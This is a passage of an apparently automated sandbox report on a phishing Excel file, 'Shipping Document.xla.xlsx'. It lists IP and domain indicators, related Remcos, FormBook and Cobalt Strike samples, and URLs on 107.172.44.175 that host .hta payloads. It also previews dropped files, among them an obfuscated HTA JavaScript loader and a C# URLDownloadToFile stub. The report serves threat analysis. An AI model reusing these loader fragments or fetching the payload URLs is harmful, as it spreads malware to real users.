                                            • GSI enabled (VBA)
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Shipping Document.xla.xlsx
                                            Detection:MAL
                                            Classification:mal100.phis.expl.evad.winXLSX@26/26@7/3
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 11
                                            • Number of non-executed functions: 2
                                            Cookbook Comments:
                                            • Found application associated with file extension: .xlsx
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Active ActiveX Object
                                            • Active ActiveX Object
                                            • Scroll down
                                            • Close Viewer
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                            • Execution Graph export aborted for target mshta.exe, PID 3648 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: Shipping Document.xla.xlsx
                                            TimeTypeDescription
                                            09:49:01API Interceptor133x Sleep call for process: mshta.exe modified
                                            09:49:09API Interceptor361x Sleep call for process: powershell.exe modified
                                            09:49:19API Interceptor11x Sleep call for process: wscript.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            193.30.119.205creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                              sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                  Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                        Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                          OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            107.172.44.175Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 107.172.44.175/1311/we/seethebestthingsgoodforentireattitudewhoputonmyheartsheismysweetbebay.hta
                                                            Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 107.172.44.175/31/RFVGG.txt
                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ip.3105.filemail.comcreamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.30.119.205
                                                            New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            DFNVereinzurFoerderungeinesDeutschenForschungsnetzesela.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 141.42.102.119
                                                            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                            • 131.173.120.204
                                                            creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.30.119.205
                                                            New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 141.14.194.207
                                                            AS-COLOCROSSINGUSsweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            • 104.168.46.26
                                                            thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            • 198.46.178.192
                                                            Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 198.46.178.192
                                                            Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 104.168.46.26
                                                            PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 192.3.176.134
                                                            Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 107.172.44.175
                                                            solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                            • 104.168.7.19
                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 23.95.140.216
                                                            sora.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 104.170.219.167
                                                            arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 192.3.253.172
                                                            ENTELCHILESACLla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                            • 11.99.146.111
                                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                            • 11.126.50.37
                                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                            • 11.99.66.51
                                                            apep.m68k.elfGet hashmaliciousUnknownBrowse
                                                            • 11.127.167.41
                                                            apep.sh4.elfGet hashmaliciousMiraiBrowse
                                                            • 164.77.57.32
                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 11.107.244.237
                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 11.96.67.142
                                                            arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 11.101.210.12
                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 200.72.209.81
                                                            m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 186.10.182.179
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            05af1f5ca1b87cc9cc9b25185115607dgr5zS9wytq.batGet hashmaliciousUnknownBrowse
                                                            • 193.30.119.205
                                                            FHG538JGH835DG86S.docGet hashmaliciousDarkTortilla, XWormBrowse
                                                            • 193.30.119.205
                                                            New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            7qsPAygCOx.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.30.119.205
                                                            DGTCkacbSz.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.30.119.205
                                                            OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 193.30.119.205
                                                            7dcce5b76c8b17472d024758970a406bNew RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 152.231.102.107
                                                            QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 152.231.102.107
                                                            Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 152.231.102.107
                                                            Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 152.231.102.107
                                                            OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 152.231.102.107
                                                            Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 152.231.102.107
                                                            Dl2EmyL53n.docGet hashmaliciousUnknownBrowse
                                                            • 152.231.102.107
                                                            P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                            • 152.231.102.107
                                                            P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                            • 152.231.102.107
                                                            kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                            • 152.231.102.107
                                                            No context
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4742
                                                            Entropy (8bit):4.8105940880640246
                                                            Encrypted:false
                                                            SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                            MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                            SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                            SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                            SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                            Malicious:false
                                                            Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                            Category:modified
                                                            Size (bytes):1105583
                                                            Entropy (8bit):1.9956117684468122
                                                            Encrypted:false
                                                            SSDEEP:48:4FQBrUzoZMa9/9W5vMk9lrfdVvFT+iL4ZQ:4uUEZMa910Mk9BfdVvB+i0ZQ
                                                            MD5:AE4E1B2E9C0AAD7875DD25F1C3F471D4
                                                            SHA1:EB8AC52F7949061D1649CBC991A99BFCB049E990
                                                            SHA-256:D5EACAF57F04B6810E94A60B83B3410E50B171EC84EE405B2C375C1E7873B426
                                                            SHA-512:D1DFABFF197BF1B11143919D069D2F562B8CB9E12195C76AB5D4F174B132A83F16B9C395A664F600BDFC2FA66D8013E0AF7EF207B6593C2640B0ABE6AEF05D6D
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta, Author: Joe Security
                                                            Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252527%2525253C%25252573%25252563%25252572%25252569%25252570%25252574%25252520%2525256C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%2525253D%2525254A%25252561%25252576%25252561%25252553%25252563%25252572%25252569%25252570%25252574%2525253E%2525256D%2525253D%25252527%25252525%25252533%25252543%25252553%25252563%25252572%25252569%25252570%25252574%25252525%25252532%25252530%2525254C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%25252525%25252533%25252544%25252525%25252532%25252537%2525254A%25252561%25252576%25252561%25252573%25252563%25252572%25252569%25252570%25252574%25252525%25252532%252
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (432), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):166106
                                                            Entropy (8bit):3.908602670987553
                                                            Encrypted:false
                                                            SSDEEP:3072:Ioqkz3n7kUfLpoPzALJhQ3goqkz3n7kUfLpoPzALJhQ3coqkz3n7kUfLpoPzALJl:IoqgLLGzALPvoqgLLGzALPLoqgLLGzA3
                                                            MD5:FDF1E15A361BAD6618125679A500A319
                                                            SHA1:DC9EFC025B886BFC5E79F8536B6C8FEB49C2A769
                                                            SHA-256:F952118BD2ECCE5A1DFD2884ADA48D397C82956DBF9541CF09AC5BA3E1DA8E56
                                                            SHA-512:DE09D3E36E3A373ECD2467A31B3207E35B159D4FF81DD6D9189EA6374E5849CF03BE22307A0266ADEB8B420E4C5BD50D0CDEAC1DCA9C60408A4ED4B3CEF494A1
                                                            Malicious:false
                                                            Preview:..........r.i.z.S.K.m.b.c.U.U.G.i.K.t.d. .=. .".G.G.B.C.U.h.k.G.l.t.G.b.d.K.o.".....m.L.t.G.q.L.p.g.N.z.d.m.x.o.N. .=. .".c.u.L.e.t.t.R.W.Q.L.c.P.A.A.d.".....H.c.p.c.L.R.m.K.A.L.f.L.W.Q.Z. .=. .".K.O.l.b.U.f.h.L.a.K.t.O.A.k.i.".....m.x.z.e.x.c.b.Z.A.k.f.W.P.A.t. .=. .".H.O.U.k.t.L.P.L.G.A.K.d.P.b.c.".....Z.p.z.c.p.p.L.Z.z.L.c.W.d.p.t. .=. .".g.f.x.L.G.L.A.R.A.W.U.W.i.a.W.".....L.L.o.L.O.o.o.g.P.J.N.W.G.h.L. .=. .".B.U.W.i.G.W.W.G.k.L.N.u.W.G.N.".........W.e.W.L.I.L.t.z.k.i.W.e.Z.W.K. .=. .".x.U.i.K.I.c.G.o.N.n.i.W.W.q.f.".....L.h.K.W.N.C.B.R.d.O.a.e.L.e.L. .=. .".W.i.a.W.i.K.z.d.z.B.d.B.p.P.i.".....P.G.p.u.K.k.S.f.m.N.A.o.W.L.h. .=. .".R.A.f.L.r.p.H.c.m.k.L.W.s.W.U.".........u.K.j.r.z.o.W.n.O.a.W.m.G.W.C. .=. .".k.K.P.I.l.R.C.A.c.G.L.W.L.h.a.".....c.c.o.L.m.U.e.N.c.f.B.f.W.v.o. .=. .".r.P.c.T.N.P.c.i.P.o.L.N.h.q.k.".....u.U.L.B.g.c.a.O.i.s.f.p.L.K.L. .=. .".x.g.W.n.L.k.b.Z.f.U.R.G.O.W.c.".....q.B.s.c.Q.z.i.R.c.o.L.i.j.L.d. .=. .".W.W.t.W.L.I.p.W.c.o.O.P.G.i.G.".....Q.L.r.b.L.K.r.H.L.L.
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                            Category:dropped
                                                            Size (bytes):3350324
                                                            Entropy (8bit):1.7377088769624822
                                                            Encrypted:false
                                                            SSDEEP:12288:46vmurYEozhngbQXg6FOEXvjDZ/ybuhVc3WWZEPB4V9GsYzVyYLZ9JnqABhphgCv:RODhqH8
                                                            MD5:A32BE3562AF3F7E24B8C4297AC5DC5C8
                                                            SHA1:43909958A286BA100A50825B4B3C4DC714A71287
                                                            SHA-256:363604FC6EAB3CAAB3F274695D071FB0797EB05D900AF8D565D6D2BFFED27DCD
                                                            SHA-512:9EE56BC51BAEFD3A2B033D30E8BB4BE10DF87889D3AF05CC2ED3755BBFA0871E157E322B39A95AB25D2C5EFD81C68F7B0189A469E64680B525845D2388428848
                                                            Malicious:false
                                                            Preview:....l...........0................]...?.. EMF....4.3.`.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................L...d...............A...............*...!..............?...........?................................'.......................%...........(.......................L...d...........)...A...........V...
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Nov 26 14:49:13 2024, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1328
                                                            Entropy (8bit):3.9900148295663955
                                                            Encrypted:false
                                                            SSDEEP:24:Hoe9EurPa4odHMhwKdNWI+ycuZhNwakSMPNnqSqd:1rErKd41ulwa3cqSK
                                                            MD5:D9A5997007E4288155B12C5615232559
                                                            SHA1:2DB6D12A1083BDDC2491A900A9441D9D31C313A7
                                                            SHA-256:EED1D432AB5C28CE6439946984FB0D185C64EA19268B3571D4571FD4661DDEE1
                                                            SHA-512:3325224E07141F6CE0CC826612EDD154AC71398BD132810A7ABFA8E3D34B4293781AFE5F9FA07B757568A09DEEDA00E929921A66637A954B833B0A59147208F7
                                                            Malicious:false
                                                            Preview:L.....Eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP................U/.l".'....6..B...........4.......C:\Users\user\AppData\Local\Temp\RES59C4.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.f.o.g.y.1.t.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):652
                                                            Entropy (8bit):3.0945375277757963
                                                            Encrypted:false
                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryrqak7YnqqebPN5Dlq5J:+RI+ycuZhNwakSMPNnqX
                                                            MD5:552F9E6C22AF27A5B0E7C036A4CC4282
                                                            SHA1:42600507AFAD25A2FDF7412FD7062C0E187AC8B5
                                                            SHA-256:48F5F5363153A3970A0F1F7FB11E14E3504B12418464C66BD7091DFC35938EE4
                                                            SHA-512:3AD5030C40C6F3A22DE0E7EDE24E32B6B514B5B9F67C20DFC4E43C5257A4A687ED7C47DE9601CDAC1F4188857431791A0FBFE3A4BB3DBC06D43DD44E88173370
                                                            Malicious:false
                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.f.o.g.y.1.t.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.f.o.g.y.1.t.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
                                                            Category:dropped
                                                            Size (bytes):469
                                                            Entropy (8bit):3.746111965605061
                                                            Encrypted:false
                                                            SSDEEP:6:V/DsYLDS81zufz/y4SkmMmJLJQXReKJ8SRHy4HCmMbfOvEnQy:V/DTLDfuLf5GSXfHEjfQy
                                                            MD5:4DC6599790027576A158B17D0BBB9AD6
                                                            SHA1:2B1F895A791C8CC6F76695BD48E7D07525AB1D81
                                                            SHA-256:DE3D07C6D53F3FB3803AC5E0975CC566206BAFABFDB344AAF30725879663BC69
                                                            SHA-512:75274E91A7F56CFD0617EDB4897237185B7AEA5A83D7E99965B9D45068D339751783F8E1199CCC936C163F9C5C84802994A93DAB037C0D8013BB9757F211A3B0
                                                            Malicious:false
                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace yFHSmkyWI.{. public class iqwQ. {. [DllImport("UrLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr rVFPcL,string gONgBy,string xa,uint mhBO,IntPtr fPOEf);.. }..}.
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):369
                                                            Entropy (8bit):5.219466074841899
                                                            Encrypted:false
                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f5f10zxs7+AEszIP23f5fP:p37Lvkmb6Kz0WZEox
                                                            MD5:570540F3716EDEEC924D6C3E06D3EB83
                                                            SHA1:B38CC3BA7A55C8462AFB1DC6415D0F71C77CC6AC
                                                            SHA-256:C27D4AC045C0F44E60411C59C708B5F113F098DED42506D0985C8E9F67DDF4F6
                                                            SHA-512:31B4F3C4714B611D664725CDC947F284DD2504936A28AF5E70E1CF7A02A6A3D95B3F8A8B1A94DBD3B9A951AAAE6A7422857C65ECA62BCF81CBE1632F32A36E7E
                                                            Malicious:true
                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.0.cs"
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3072
                                                            Entropy (8bit):2.810193895632383
                                                            Encrypted:false
                                                            SSDEEP:24:etGSCPBu5exl8sHgkrqPjtkZf8d+YjcUWI+ycuZhNwakSMPNnq:6Zsx+S8CJ8d+YA31ulwa3cq
                                                            MD5:71A4B0306A27F1875492D845962E71B2
                                                            SHA1:B4B0BD4D9F8CFABC2C86775A650C8A6854230319
                                                            SHA-256:92CE7D3CE73E5755E6E9D6AB0D8B095AC096F7BBE763869D4130C495CB7C664B
                                                            SHA-512:0A16A4E251F632ACA5F7DFA26385389D460A8D468A9E2170E534C860004A0C14032C8B41CA4F38BAC1F82F3CB063C06A3AB68C4898FCAA0957D08CBA2388A0B2
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....q.....q.......................................... =.....P ......O.........U.....\.....c.....f.....k...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.cf
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):866
                                                            Entropy (8bit):5.325944510233447
                                                            Encrypted:false
                                                            SSDEEP:24:AId3ka6KzVEoUKaMD5DqBVKVrdFAMBJTH:Akka60VEoUKdDcVKdBJj
                                                            MD5:08AE3B9132904DE927F976A881DE77F5
                                                            SHA1:C1C1ED3D0079DD8BADF611777F8E2BB91B2AE7E4
                                                            SHA-256:0D3BD42490B602FBB1C8DC9DF200088AAD949D623B1794502A57C3FB8E98F639
                                                            SHA-512:433DFC0FB6088F0DDBA0C0AFC5CB309FBA0F96D1C33C803C3316E761E7A4CB85B1FB470AC93068704DB51D242201AD5B8BFA0C5AA22572420EFB2AFC529A10B3
                                                            Malicious:false
                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
